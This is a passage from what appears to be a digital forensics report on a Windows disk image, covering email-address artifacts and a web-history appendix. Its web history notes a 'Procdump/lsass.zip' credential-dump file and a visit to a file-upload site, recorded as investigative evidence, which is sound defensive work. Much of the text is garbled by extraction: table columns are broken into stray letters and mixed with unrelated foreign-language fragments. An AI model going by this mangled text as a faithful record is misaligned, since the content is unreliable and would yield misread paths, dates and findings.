s
osta vastaanottajia /
«[email protected]« img_disk.raw/vol_vol7/Windows/System32/DriverStore/FileRepository/p
01/01/2000)objet ob rnms002.inf_amd64_6d7ddeebcacd2a6d/Amd64/FXSRES.DLL
osta vastaanottajia /
«[email protected]« img_disk.raw/vol_vol7/Windows/System32/spool/drivers/x64/3/FXSRE
01/01/2000)objet ob S.DLL
osta vastaanottajia /
«[email protected]« img_disk.raw/vol_vol7/Windows/WinSxS/amd64_dual_prnms002.inf_31
01/01/2000)objet ob bf3856ad364e35_10.0.17763.1_none_de4a75df21a850fc/Amd64/FXS
RES.DLL
Page 127/145
[email protected]
Ta
Preview Source File
gs
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
Page 128/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
osoitteeni on /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected] t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e7
«. etsi (c:\da da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
Page 129/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
Tag
Preview Source File
s
optype30{\staticval «[email protected]«} /
{\propname msip_lab img_disk.raw/vol_vol7/Windows/Panther/
setupinfo
[email protected]
T
a
Preview Source File
g
s
Page 130/145
[email protected]
T
Preview Source File a
gs
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
onmicrosoft.com v i /img_disk.raw/vol_vol7/Program
«[email protected] Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64__8
m«. parandage viga ja wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
Shared/OFFICE16/MSOIDRES.DLL
Page 131/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
ssaadid nimekirjast /
«[email protected]« img_disk.raw/vol_vol7/Windows/System32/DriverStore/FileRepository/
2000.01.01"t ma t m prnms002.inf_amd64_6d7ddeebcacd2a6d/Amd64/FXSRES.DLL
ssaadid nimekirjast /
«[email protected]« img_disk.raw/vol_vol7/Windows/System32/spool/drivers/x64/3/FXSRE
2000.01.01"t ma t m S.DLL
ssaadid nimekirjast /
«[email protected]« img_disk.raw/vol_vol7/Windows/WinSxS/amd64_dual_prnms002.inf_3
2000.01.01"t ma t m 1bf3856ad364e35_10.0.17763.1_none_de4a75df21a850fc/Amd64/FX
SRES.DLL
Page 132/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 133/145
[email protected]
T
a
Preview Source File
g
s
e examples: kevinc, /
«[email protected]«, img_disk.raw/vol_vol7/Windows/SystemApps/Microsoft.AccountsControl
domain\kevinctypes _cw5n1h2txyewy/pris/resources.en-US.pri
[email protected]
T
a
Preview Source File
g
s
Page 134/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
Page 135/145
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
" 39) /
href="mailto:«lena.su img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.Microsof
[email protected]«? tEdge_8wekyb3d8bbwe/AC/#!001/MicrosoftEdge/Cache/KBBFFLP4/mystery-
subject='mystery lu lung-illness-linked-vaping-health-officials-investigating-nearly-possible-
cases[1].htm
[email protected]
T
a
Preview Source File
g
s
" 45) /
href="mailto:«lindsey.b img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.Micros
[email protected]« oftEdge_8wekyb3d8bbwe/AC/#!
?subject='mystery lu 001/MicrosoftEdge/Cache/KBBFFLP4/mystery-lung-illness-linked-vaping-
health-officials-investigating-nearly-possible-cases[1].htm
[email protected]
T
a
Preview Source File
g
s
Page 136/145
[email protected]
T
a
Preview Source File
g
s
rence.setstateasync /img_disk.raw/vol_vol7/Program
«[email protected]« Files/WindowsApps/Microsoft.Office.OneNote_16001.10228.20003.0
showerroronpinneddr _x64__8wekyb3d8bbwe/mso98imm.dll
[email protected]
Ta
Preview Source File
gs
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
Page 137/145
T
a
Preview Source File
g
s
01/01/20000asunto a rnms002.inf_amd64_6d7ddeebcacd2a6d/Amd64/FXSRES.DLL
[email protected]
T
a
Preview Source File
g
s
e-mailadres: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
píx_tà«[email protected] t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e7
«. 5° celsius da144/Alphabet.xml
[email protected]
Ta
Preview Source File
gs
Page 138/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
Preview
AppendixC
Remote Drive
Local path Remote path Tags
AppendixD
Web History
R U
U
e R
T se
f L T
Date i Pr r
e D a
URL Acces t ogr Domain n Source File
r o g
sed l am a
r m s
e m
e ai
e
r n
file:///C:/Users/Craig/Desktop/Procdump/lsass.zip 2020 Mi C /
-05- cro ra img_disk.raw/vol_vo
07 sof ig l7/Users/Craig/AppD
21:0 t ata/Local/Microsoft/
1:00 Ed Windows/WebCach
CDT ge e/WebCacheV01.da
t
Page 139/145
R U
U
e R
T se
f L T
Date i Pr r
e D a
URL Acces t ogr Domain n Source File
r o g
sed l am a
r m s
e m
e ai
e
r n
file:///C:/Windows/system32/oobe/FirstLogonAnim.ht 2019 Mi Al /
ml -11- cro a img_disk.raw/vol_vo
06 sof n l7/Users/Alan/AppD
16:3 t ata/Local/Microsoft/
9:33 Ed Windows/WebCach
CST ge e/WebCacheV01.da
t
http://www.abc.net.au/ 2020 Mi www.a Al /
-05- cro bc.net. a img_disk.raw/vol_vo
07 sof au n l7/Users/Alan/AppD
20:3 t ata/Local/Microsoft/
8:44 Ed Windows/WebCach
CDT ge e/WebCacheV01.da
t
https://edition.cnn.com/ 2020 Mi edition. Al /
-05- cro cnn.co a img_disk.raw/vol_vo
07 sof m n l7/Users/Alan/AppD
20:3 t ata/Local/Microsoft/
8:50 Ed Windows/WebCach
CDT ge e/WebCacheV01.da
t
https://go.microsoft.com/ 2020 Mi go.micr Al /
-05- cro osoft.c a img_disk.raw/vol_vo
07 sof om n l7/Users/Alan/AppD
20:3 t ata/Local/Microsoft/
7:50 Ed Windows/WebCach
CDT ge e/WebCacheV01.da
t
https://go.microsoft.com/fwlink/?LinkId=525773 2020 Mi go.micr Al /
-05- cro osoft.c a img_disk.raw/vol_vo
07 sof om n l7/Users/Alan/AppD
20:3 t ata/Local/Microsoft/
7:50 Ed Windows/WebCach
CDT ge e/WebCacheV01.da
t
https://microsoftedgetips.microsoft.com/ 2020 Mi micros Al /
-05- cro oftedge a img_disk.raw/vol_vo
07 sof tips.mic n l7/Users/Alan/AppD
20:3 t rosoft.c ata/Local/Microsoft/
Page 140/145
R U
U
e R
T se
f L T
Date i Pr r
e D a
URL Acces t ogr Domain n Source File
r o g
sed l am a
r m s
e m
e ai
e
r n
7:52 Ed om Windows/WebCach
CDT ge e/WebCacheV01.da
t
https://microsoftedgetips.microsoft.com/en-us/0? 2020 Mi micros Al /
source=firstrun -05- cro oftedge a img_disk.raw/vol_vo
07 sof tips.mic n l7/Users/Alan/AppD
20:3 t rosoft.c ata/Local/Microsoft/
7:57 Ed om Windows/WebCach
CDT ge e/WebCacheV01.da
t
https://microsoftedgetips.microsoft.com/en-us/0? 2020 Mi micros Al /
source=firstrun -05- cro oftedge a img_disk.raw/vol_vo
07 sof tips.mic n l7/Users/Alan/AppD
20:3 t rosoft.c ata/Local/Microsoft/
7:59 Ed om Windows/WebCach
CDT ge e/WebCacheV01.da
t
https://microsoftedgetips.microsoft.com/en-us/? 2020 Mi micros Al /
source=firstrun -05- cro oftedge a img_disk.raw/vol_vo
07 sof tips.mic n l7/Users/Alan/AppD
20:3 t rosoft.c ata/Local/Microsoft/
7:58 Ed om Windows/WebCach
CDT ge e/WebCacheV01.da
t
https://microsoftedgewelcome.microsoft.com/ 2020 Mi micros Al /
-05- cro oftedge a img_disk.raw/vol_vo
07 sof welcom n l7/Users/Alan/AppD
20:3 t e.micro ata/Local/Microsoft/
7:50 Ed soft.co Windows/WebCach
CDT ge m e/WebCacheV01.da
t
https://microsoftedgewelcome.microsoft.com/redirect 2020 Mi micros Al /
/?source=firstrun -05- cro oftedge a img_disk.raw/vol_vo
07 sof welcom n l7/Users/Alan/AppD
20:3 t e.micro ata/Local/Microsoft/
7:50 Ed soft.co Windows/WebCach
CDT ge m e/WebCacheV01.da
t
https://uploadfiles.io/ 2020 Mi uploadf Al /
Page 141/145
R U
U
e R
T se
f L T
Date i Pr r
e D a
URL Acces t ogr Domain n Source File
r o g
sed l am a
r m s
e m
e ai
e
r n
Page 142/145
R U
U
e R
T se
f L T
Date i Pr r
e D a
URL Acces t ogr Domain n Source File
r o g
sed l am a
r m s
e m
e ai
e
r n
CDT ge e/WebCacheV01.da
t
https://www.bing.com/search? 2020 Mi www.bi Al /
q=abc+net+australia&form=EDNTHT&mkt=en- -05- cro ng.com a img_disk.raw/vol_vo
au&httpsmsn=1&plvar=0&refig=e031eb64486d4946c 07 sof n l7/Users/Alan/AppD
bdd4d96939ae686&sp=-1&pq=abc+net+&sc=8- 20:3 t ata/Local/Microsoft/
8&qs=n&sk=&cvid=e031eb64486d4946cbdd4d9693 8:29 Ed Windows/WebCach
9ae686 CDT ge e/WebCacheV01.da
t
https://www.bing.com/search? 2020 Mi www.bi Al /
q=abc+net+australia&form=EDNTHT&mkt=en- -05- cro ng.com a img_disk.raw/vol_vo
au&httpsmsn=1&plvar=0&refig=e031eb64486d4946c 07 sof n l7/Users/Alan/AppD
bdd4d96939ae686&sp=-1&pq=abc+net+&sc=8- 20:3 t ata/Local/Microsoft/
8&qs=n&sk=&cvid=e031eb64486d4946cbdd4d9693 8:29 Ed Windows/WebCach
9ae686 CDT ge e/WebCacheV01.da
t
https://www.bing.com/search? 2020 Mi www.bi Al /
q=cnn&qs=n&form=QBRE&sp=-1&pq=&sc=1- -05- cro ng.com a img_disk.raw/vol_vo
0&sk=&cvid=C664B0F2B90F4FA4BD840FF24D5A8 07 sof n l7/Users/Alan/AppD
AB9 20:3 t ata/Local/Microsoft/
8:19 Ed Windows/WebCach
CDT ge e/WebCacheV01.da
t
https://www.bing.com/search? 2020 Mi www.bi Al /
q=cnn&qs=n&form=QBRE&sp=-1&pq=&sc=1- -05- cro ng.com a img_disk.raw/vol_vo
0&sk=&cvid=C664B0F2B90F4FA4BD840FF24D5A8 07 sof n l7/Users/Alan/AppD
AB9 20:3 t ata/Local/Microsoft/
8:19 Ed Windows/WebCach
CDT ge e/WebCacheV01.da
t
https://www.bing.com/search? 2020 Mi www.bi Al /
q=nn&form=EDGSPH&mkt=en- -05- cro ng.com a img_disk.raw/vol_vo
au&httpsmsn=1&plvar=0&refig=8742925aa25c41d88 07 sof n l7/Users/Alan/AppD
a2af27f59a747eb&sp=-1&pq=&sc=0- 20:3 t ata/Local/Microsoft/
0&qs=n&sk=&cvid=8742925aa25c41d88a2af27f59a 8:15 Ed Windows/WebCach
747eb CDT ge e/WebCacheV01.da
t
https://www.bing.com/search? 2020 Mi www.bi Al /
q=nn&form=EDGSPH&mkt=en- -05- cro ng.com a img_disk.raw/vol_vo
Page 143/145
R U
U
e R
T se
f L T
Date i Pr r
e D a
URL Acces t ogr Domain n Source File
r o g
sed l am a
r m s
e m
e ai
e
r n
Page 144/145
R U
U
e R
T se
f L T
Date i Pr r
e D a
URL Acces t ogr Domain n Source File
r o g
sed l am a
r m s
e m
e ai
e
r n
t
https://www.washingtonpost.com/
Page 145/145